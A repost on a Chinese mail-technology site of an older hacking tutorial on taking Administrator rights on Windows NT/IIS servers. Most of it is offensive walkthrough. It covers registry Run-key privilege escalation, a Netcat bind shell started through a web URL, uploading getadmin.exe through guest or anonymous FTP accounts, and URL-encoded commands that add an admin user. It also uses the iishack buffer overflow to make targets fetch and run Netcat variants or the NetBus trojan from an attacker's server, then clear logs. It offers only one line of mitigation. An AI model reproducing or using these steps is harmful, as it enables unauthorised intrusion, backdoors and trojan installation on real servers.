首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

操作系统

Windows 9X | Linux&Uinx | Windows Server | 其它操作系统 | Vista | FreeBSD | Windows 7 |
首页 > 操作系统 > Windows Server > 教你获取WindowsNT的Admin权限的方法 > 正文

教你获取WindowsNT的Admin权限的方法

出处:黑客基地 作者:黑客基地 时间:2007-1-17 18:49:00

一、通过修改注册表

凡是具有登录NT本机的用户,例如IUSR_machine,都具有对 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 项的可读可写权限,该用户可以远程访问这个项。比如,他可以创建一个bat文件,文件内容为:cmd.exe /c net localgroup administrators IUSR_machine /add,把该文件copy到winnt目录下,然后在注册表上述的项添加一个数值,指向这个文件。

那么,当下次Admin登录到该机器上时,就会自动把IUSR_machine添加到Administrators组。

另,注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以这么做。

二、自建Telnet服务在NT上执行指令

要求用户有文件上传权限,而且该目录位于web目录下,该目录允许执行,下面是具体步骤。

假设你的目录是www.xxx.com/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去。

然后,在浏览器端输入:

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

这时候,你的浏览器将停止不动,实际上,Server上的Telnet的服务已经产生了。

这时,用Telnet连接www.xxx.com的23端口。你发现,不用密码,不用登陆,对方C:\提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止。

Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务。在浏览器端输入上述的字符串,等价于在NT的Dos方式下输入

nc -l -p 23 -t -e cmd.exe

这将把cmd.exe绑定到23端口上。

三、入侵NTserver典型途径V2.0

1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root。

2、用Netcat和iishack可以获得root。

3、Iusr_计算机名这个帐号有ftp上传,web执行等权限。

4、在Web server上执行程序是入侵NT的关键。

5、要在Web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

第一个方法、用Iusr_ntsvr2后者Guest这两个帐号

这里假设我们已经破解了这个帐号的密码,在浏览器输入:

http://www.xxx.com/scripts/uploadn.asp

guest和iusr_ntsvr2这两个帐号都可以进这个asp页面,在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。

然后输入:

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以Add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32
\net.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/scripts/getadmin.exe?china

第二个方法、用匿名Ftp

如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

ftp www.xxx.com 
Connected to www.xxx.com 
      220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。

User (www.xxx.com:(none)):anonymous 
      331 Anonymous access allowed, send identity (e-mail name) as password.

Password:输入 guest@ 或者guest。

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。在这种情况下我们就可以进NT server的ftp了。

进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32
\net.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录。

第三个方法、用netcat和iishack

如果你熟悉使用Netcat这个工具,你就知道,netcat可以利用NT的弱点在其上绑定端口,下面用eEye的工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。

IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现IIShack.asm,利用这个毛病,eEye写了两个程序:

iishack.exe 
      ncx99.exe

为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web server的目录下,比如你的web server是:

www.mysvr.com? 而对方的IIS server是www.xxx.com


则:

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)


上述命令输入后这时你应该可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- 
(c) dark spyrit -- barns@eeye.com. 
http://www.eEye.com 
[usage: iishack ] 
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe 
do not include 'http://' before hosts! 
--------------------------------------------------------------- 
      Data sent!

然后,再把Netbus等特洛伊木马传到对方机器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe


ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务。 ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用。所以可能不一定有效。然后,用Telnet到对方的99或80端口:

Telnet www.xxx.com 99

结果是这样:

Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 
C:\>[You have full access to the system, happy browsing :)] 
C:\>[Add a scheduled task to restart inetinfo in X minutes] 
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] 
      C:\>[Clean up any trace or logs we might have left behind.]


这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。

补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除。

其它:用Retina.exe得到NT域内的帐号清单,逐个尝试这些帐号,如果有的密码薄弱而被你猜出来,就可以用上面的方法来获取NT的Admin。

相关文章 热门文章
  • 微软宣布已售出4亿份Windows 7许可
  • Powercfg 从命令行控制系统的电源管理
  • windows NT 4.0 Domain升级到windows server 2008 R2需要注意的几个问题
  • windows 7使用GPO统一桌面黑屏
  • Windows server 2008 R2上安装exchange 2010注意的问题
  • 利用Windows Server Backup备份Exchange 2010 DAG
  • 恢复安装在Windows 2008域控制器上的Exchange 2010
  • Windows 2003域更名工具(Domain Rename Tool)
  • 创建Windows 7部署介质
  • 轻松传送——Windows Easy Transfer
  • 使用MDT 2010执行Windows 7裸机安装
  • 限制Windows管理员账户的并发登录
  • “http 500内部服务器错误”的解决方法
  • 利用Windows 2000 Server的RRAS实现VPN服务器
  • 用凤凰万能启动盘解决本地/域管理员密码丢失
  • Win2003 Server企业版安装配置
  • Active directory 灾难恢复
  • Windows 2000/03域和活动目录
  • 如何在vmware4上创建windows 2003群集
  • MSI文件制作全过程
  • Win2000命令全集(一)
  • Windows 2000/AD技巧
  • 此系统的本地策略不允许您采用交互式登录解决方法
  • Win2000路由的安装与设置实现不同网段互通
  • 自由广告区
     
    最新软件下载
  • SharePoint Server 2010 部署文档
  • Exchange 2010 RTM升级至SP1 教程
  • Exchange 2010 OWA下RBAC实现的组功能...
  • Lync Server 2010 Standard Edition 标..
  • Lync Server 2010 Enterprise Edition...
  • Forefront Endpoint Protection 2010 ...
  • Lync Server 2010 Edge 服务器部署文档
  • 《Exchange 2003专家指南》
  • Mastering Hyper-V Deployment
  • Windows Server 2008 R2 Hyper-V
  • Microsoft Lync Server 2010 Unleashed
  • Windows Server 2008 R2 Unleashed
  • 今日邮件技术文章
  • 腾讯,在创新中演绎互联网“进化论”
  • 华科人 张小龙 (中国第二代程序员 QQ...
  • 微软推出新功能 提高Hotmail密码安全性
  • 快压技巧分享:秒传邮件超大附件
  • 不容忽视的邮件营销数据分析过程中的算..
  • 国内手机邮箱的现状与未来发展——访尚..
  • 易观数据:2011Q2中国手机邮箱市场收入..
  • 穿越时空的爱恋 QQ邮箱音视频及贺卡邮件
  • Hotmail新功能:“我的朋友可能被黑了”
  • 入侵邻居网络发骚扰邮件 美国男子被重..
  • 网易邮箱莫子睿:《非你莫属》招聘多过..
  • 中国电信推广189邮箱绿色账单
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号